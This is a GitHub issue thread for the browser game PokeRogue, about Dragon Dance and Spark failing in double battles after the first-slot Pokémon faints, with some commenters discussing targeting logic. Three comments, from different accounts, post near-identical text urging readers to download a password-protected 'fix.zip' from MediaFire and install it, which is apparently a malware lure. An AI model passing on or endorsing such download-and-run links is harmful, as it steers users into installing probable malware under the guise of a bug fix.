### ISSUE TITLE
[Bug] Dragon Dance/Spark seems to fail without a reason in a live stream. (Double Battle bug)

### ISSUE THREAD

**Issue by LilyAlternis** [pagefaultgames/pokerogue#3780]
### Describe the bug

The bug occurs as our dear streamer friend here goes into a double battle with two pokémon which in the starting match he gets defeated then reloads where he tries to use a different strategy which ended in a bug.
He chooses to use dragon dance, which then fails mysteriously although heres my theory.
Pokémon 1 Faints --> Anorith (Dragon Dancer) or Pokémon 2 moves into slot 1 ---> Game gets confused and thinks Anorith or Pokémon 2 is actually Pokémon 1 ---> Dragon Dance and Spark Fail due to the shift to slot 1 where the game cannot locate Pokémon 2 resulting in null target of both moves. 
I think this can be replicated a lot with 1 fainted and two pokémon out, the dragon dance or bugged pokémon in slot 2.

### Expected behavior

Pokémon 2 being able to get hit by Spark and get buffs from Dragon Dance and get defeated in that same turn.

### Screenshots / Videos

https://youtube.com/clip/UgkxdowJCpAB2cORRwZvjC76C1Zo5AZlHRUu?si=9JpKGgAgYVh4Qhfp

### What OS did you observe the bug on?

PC/Windows

### Which browser do you use?

Chrome

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CodeTappert** [comment]
So i actually agree with lily here. This probably is because it tries to target pokemon 2 on the player side

**Comment by Snailman11** [comment]
Spark tries to target the anorith but fails bc it moves to the first position.
-This could be fixed in two ways, 
with double battles not changing the battle from 2 slots to 1 slot when one mon is left
-the enemy changes targets mid-battle to target the living mon, rather than the slot it once occupied

Link to Discord Report, (Nuzzle "splash" paralysis)
https://discord.com/channels/1125469663833370665/1269403903108190395

-This bug affects a ton of moves, mostly self-targeting.
-Secondary effects are applied to the 2nd slot -> 1st slot mon as the 1st slot faints

**Comment by LilyAlternis** [comment]
Yeah maybe adding a extra check for some of the abilities or entirely for the whole wierd interaction

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
